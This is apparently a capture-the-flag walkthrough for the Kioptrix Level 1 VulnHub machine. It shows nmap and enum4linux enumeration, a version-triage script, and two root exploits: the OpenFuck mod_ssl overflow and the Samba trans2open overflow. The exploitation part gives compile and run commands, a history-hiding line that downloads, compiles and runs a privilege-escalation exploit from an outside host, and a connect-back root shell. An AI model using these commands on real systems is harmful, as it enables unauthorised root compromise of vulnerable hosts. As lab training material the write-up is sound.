Kioptrix 1 Vulnhub
Kioptrix 1
URL: https://www.vulnhub.com/entry/kioptrix-level-1-1,22/
Desc: Kioptrix Level 1 is an easy boot-to-root machine. It can be exploited through several different vulnerabilities; two of them (Apache mod_ssl/OpenSSL and Samba) are demonstrated below.
1. Enumeration
Nmap
Command used:
nmap -sC -sV -A -O 192.168.48.131
(-sC runs the default NSE scripts, -sV probes service versions, -A adds OS detection, traceroute and script scanning; -O is redundant once -A is given)
Results:
nmap -sC -sV -A -O 192.168.48.131
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-27 16:26 EDT
Nmap scan report for 192.168.48.131
Host is up (0.00068s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey:
| 1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
| 1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_ 1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: 400 Bad Request
|_ssl-date: 2019-10-27T21:28:58+00:00; +1h01m51s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_128_EXPORT40_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_RC4_128_WITH_MD5
| SSL2_RC4_64_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
|_ SSL2_DES_64_CBC_WITH_MD5
1024/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:26:A4:B4 (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop
Host script results:
|_clock-skew: 1h01m50s
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_smb2-time: Protocol negotiation failed (SMB2)
TRACEROUTE
HOP RTT ADDRESS
1 0.68 ms 192.168.48.131
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 127.45 seconds
Ports Open
- 22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
- 80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
- 111/tcp open rpcbind 2 (RPC #100000)
- 139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
- 443/tcp open ssl/https Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
- 1024/tcp open status 1 (RPC #100024)
Enum4linux
enum4linux 192.168.48.131
Results
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Oct 27 23:32:17 2019
...
=======================================
| OS information on 192.168.48.131 |
=======================================
[+] Got OS info for 192.168.48.131 from smbclient: Domain=[MYGROUP] OS=[Unix] **Server=[Samba 2.2.1a]**
[+] Got OS info for 192.168.48.131 from srvinfo:
KIOPTRIX Wk Sv PrQ Unx NT SNT Samba Server
platform_id : 500
os version : 4.5
server type : 0x9a03
...
==========================================
| Share Enumeration on 192.168.48.131 |
==========================================
WARNING: The "syslog" option is deprecated
Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a]
Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a]
Sharename Type Comment
--------- ---- -------
IPC$ IPC IPC Service (Samba Server)
ADMIN$ IPC IPC Service (Samba Server)
Server Comment
--------- -------
KIOPTRIX Samba Server
Workgroup Master
--------- -------
MYGROUP KIOPTRIX
WORKGROUP ELSAFFA7
[+] Attempting to map shares on 192.168.48.131
//192.168.48.131/IPC$ [E] Can't understand response:
WARNING: The "syslog" option is deprecated
Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a]
NT_STATUS_NETWORK_ACCESS_DENIED listing *
//192.168.48.131/ADMIN$ [E] Can't understand response:
WARNING: The "syslog" option is deprecated
Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a]
tree connect failed: NT_STATUS_WRONG_PASSWORD
Enum4linux identifies the Samba version as 2.2.1a (nmap only reported "Samba smbd"); the second exploitation path below relies on that version.
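As an added example (not part of the original writeup), the following Python script runs the same version triage over the enumeration output above: it parses the nmap service lines and the smbclient banner that enum4linux printed, compares the observed OpenSSL, mod_ssl and Samba versions against the first fixed releases for the bugs exploited later on this page, and flags the SSHv1/SSLv2 findings. The sample input is constructed from the scan output shown above; the fixed-version thresholds and the notes attached to each finding are my own, taken from the respective advisories rather than from the scan.

```python
import re

# Constructed sample input, copied from the scan output in this writeup:
# the nmap -sV service lines plus the smbclient banner enum4linux printed.
SAMPLE_NMAP = """\
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
|_sshv1: Server supports SSHv1
80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp  open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|   SSLv2 supported
1024/tcp open  status      1 (RPC #100024)
"""
SAMPLE_SMB = "Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a]"

# (component, regex capturing the version, first fixed release, why it matters).
# The fixed-release thresholds come from the advisories for the two bugs used
# later in this writeup (my values, not something read from the scan).
VERSION_CHECKS = [
    ("OpenSSL", r"OpenSSL/(\d[\w.]*)", "0.9.6e",
     "SSLv2 KEY_ARG overflow (CVE-2002-0656), the bug OpenFuck exploits"),
    ("mod_ssl", r"mod_ssl/(\d[\w.]*)", "2.8.7",
     "version range targeted by the mod_ssl/OpenSSL remote exploits (< 2.8.7)"),
    ("Samba", r"Server=\[Samba (\d[\w.]*)\]", "2.2.8a",
     "trans2open overflow (CVE-2003-0201), the bug the eSDee samba-2.2.8 exploit uses"),
]

# Protocol findings that need no version comparison: (regex, label, note).
PROTOCOL_CHECKS = [
    (r"Server supports SSHv1", "SSHv1", "SSH protocol 1 is enabled"),
    (r"SSLv2 supported", "SSLv2", "SSLv2 (with export ciphers) is enabled"),
]


def parse_version(text):
    """Turn '0.9.6b' into (0, 9, 6, 'b') and '2.8.4' into (2, 8, 4, '') so
    that versions compare element-wise, including the letter suffix that
    OpenSSL and Samba use for point releases."""
    m = re.match(r"(\d+(?:\.\d+)*)([a-z]?)", text)
    if not m:
        raise ValueError("unparseable version: %r" % text)
    nums = [int(n) for n in m.group(1).split(".")]
    nums += [0] * (3 - len(nums))          # pad so tuples have equal length
    return tuple(nums[:3]) + (m.group(2),)


def triage(nmap_output, smb_banner):
    """Return a sorted list of (component, observed, note) findings,
    deduplicated across ports (OpenSSL/mod_ssl appear on both 80 and 443)."""
    text = nmap_output + "\n" + smb_banner
    findings = {}
    for component, pattern, fixed_in, note in VERSION_CHECKS:
        for m in re.finditer(pattern, text):
            observed = m.group(1)
            if parse_version(observed) < parse_version(fixed_in):
                findings[(component, observed)] = note
    for pattern, label, note in PROTOCOL_CHECKS:
        if re.search(pattern, text):
            findings[(label, "enabled")] = note
    return sorted((c, v, n) for (c, v), n in findings.items())


if __name__ == "__main__":
    for component, observed, note in triage(SAMPLE_NMAP, SAMPLE_SMB):
        print("%-8s %-8s %s" % (component, observed, note))
```

Feeding the script real output (for example `nmap -sV -oN scan.txt` plus the `Server=[...]` line from smbclient) is a matter of reading the two strings from files; the version parser is the part worth keeping, since a plain string comparison would wrongly rank "0.9.6b" against "0.9.10".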
2. Exploitation
Getting root using the Apache mod_ssl/OpenSSL vulnerability.
Searching Exploit-DB (searchsploit) for Apache mod_ssl:
--------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
--------------------------------------- ----------------------------------------
Apache mod_ssl 2.0.x - Remote Denial o | exploits/linux/dos/24590.txt
Apache mod_ssl 2.8.x - Off-by-One HTAc | exploits/multiple/dos/21575.txt
Apache mod_ssl < 2.8.7 OpenSSL - 'Open | exploits/unix/remote/21671.c
Apache mod_ssl < 2.8.7 OpenSSL - 'Open | exploits/unix/remote/47080.c
Apache mod_ssl < 2.8.7 OpenSSL - 'Open | exploits/unix/remote/764.c
Apache mod_ssl OpenSSL < 0.9.6d / < 0. | exploits/unix/remote/40347.txt
--------------------------------------- ----------------------------------------
Shellcodes: No Result
The exploit exploits/unix/remote/47080.c matches both the Apache version (1.3.20) and the mod_ssl version (2.8.4). It is the updated version of the older OpenFuck exploit exploits/unix/remote/764.c. A few additional steps are needed before it can be used:
- Install libssl-dev:
apt-get install libssl-dev
- Compile the program:
gcc -o OpenFuck OpenFuck.c -lcrypto
- Run it against the target:
./OpenFuck 0x6b 192.168.48.131 -c 50
Running the program without any arguments prints the list of supported OS/Apache targets. The two relevant to this system are:
0x6a - RedHat Linux 7.2 (apache-1.3.20-16)1
0x6b - RedHat Linux 7.2 (apache-1.3.20-16)2
Both were tried; 0x6b is the one that worked. With 0x6a the program reports that it is spawning a shell and then exits without giving one. The -c 50 option opens 50 connections before the shellcode is sent (the output shows "Connection... 50 of 50").
Note that the exploit does not stop at the unprivileged apache shell: the command visible in the output below (unset HISTFILE; cd /tmp; wget ... ptrace-kmod.c; gcc ...; ./p;) is embedded in the exploit itself and is sent automatically. It downloads and compiles the ptrace/kmod local privilege escalation for this 2.4 kernel, so the target needs outbound access to dl.packetstormsecurity.net, or the URL in the exploit source has to be changed to a web server you control that hosts ptrace-kmod.c.
Result
:~# ./OpenFuck 0x6a 192.168.48.131 -c 50
*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena irc.brasnet.org *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************
Connection... 50 of 50
Establishing SSL connection
cipher: 0x4043808c ciphers: 0x80f8050
Ready to send shellcode
Spawning shell...
Good Bye!
:~# ./OpenFuck 0x6b 192.168.48.131 -c 50
*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena irc.brasnet.org *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************
Connection... 50 of 50
Establishing SSL connection
cipher: 0x4043808c ciphers: 0x80f8050
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$
bash-2.05$ unset HISTFILE; cd /tmp; wget http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p;
--18:34:37-- http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
=> `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:80... connected!
HTTP request sent, awaiting response... 301 Moved Permanently
Location: https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c [following]
--18:34:38-- https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
=> `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:443... connected!
HTTP request sent, awaiting response... 200 OK
Length: 3,921 [text/x-csrc]
0K ... 100% @ 1.87 MB/s
18:34:38 (1.25 MB/s) - `ptrace-kmod.c' saved [3921/3921]
[+] Attached to 1995
[+] Waiting for signal
[+] Signal caught
[+] Shellcode placed at 0x4001189d
[+] Now wait for suid shell...
whoami
root
Getting root using the Samba vulnerability.
Enum4linux identified the Samba version as 2.2.1a. Searching Exploit-DB for that version turns up 10.c, eSDee's "samba-2.2.8 < remote root exploit" (the trans2open buffer overflow, CVE-2003-0201), which covers 2.2.1a.
To run this exploit:
- Compile using: gcc 10.c -o samba-exp
- Run the exploit with:
./samba-exp -b 0 -c 192.168.48.132 -C 40 192.168.48.131
Here -b 0 selects the Linux brute-force target, -c 192.168.48.132 is the attacker's address that the root shell connects back to, -C 40 is the maximum number of child processes used while brute-forcing (40 is the default), and the last argument, 192.168.48.131, is the victim. The exploit's own usage text lists these options; -C is not the victim address.
Result
samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
--------------------------------------------------------------
+ Bruteforce mode. (Linux)
+ Host is running samba.
+ Worked!
--------------------------------------------------------------
*** JE MOET JE MUIL HOUWE
Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown
uid=0(root) gid=0(root) groups=99(nobody)
whoami
root
The Flag:
cat /var/mail/root
From root Sat Sep 26 11:42:10 2009
Return-Path: <root@kioptix.level1>
Received: (from root@localhost)
by kioptix.level1 (8.11.6/8.11.6) id n8QFgAZ01831
for root@kioptix.level1; Sat, 26 Sep 2009 11:42:10 -0400
Date: Sat, 26 Sep 2009 11:42:10 -0400
From: root <root@kioptix.level1>
Message-Id: <200909261542.n8QFgAZ01831@kioptix.level1>
To: root@kioptix.level1
Subject: About Level 2
Status: O
If you are reading this, you got root. Congratulations.
Level 2 won't be as easy...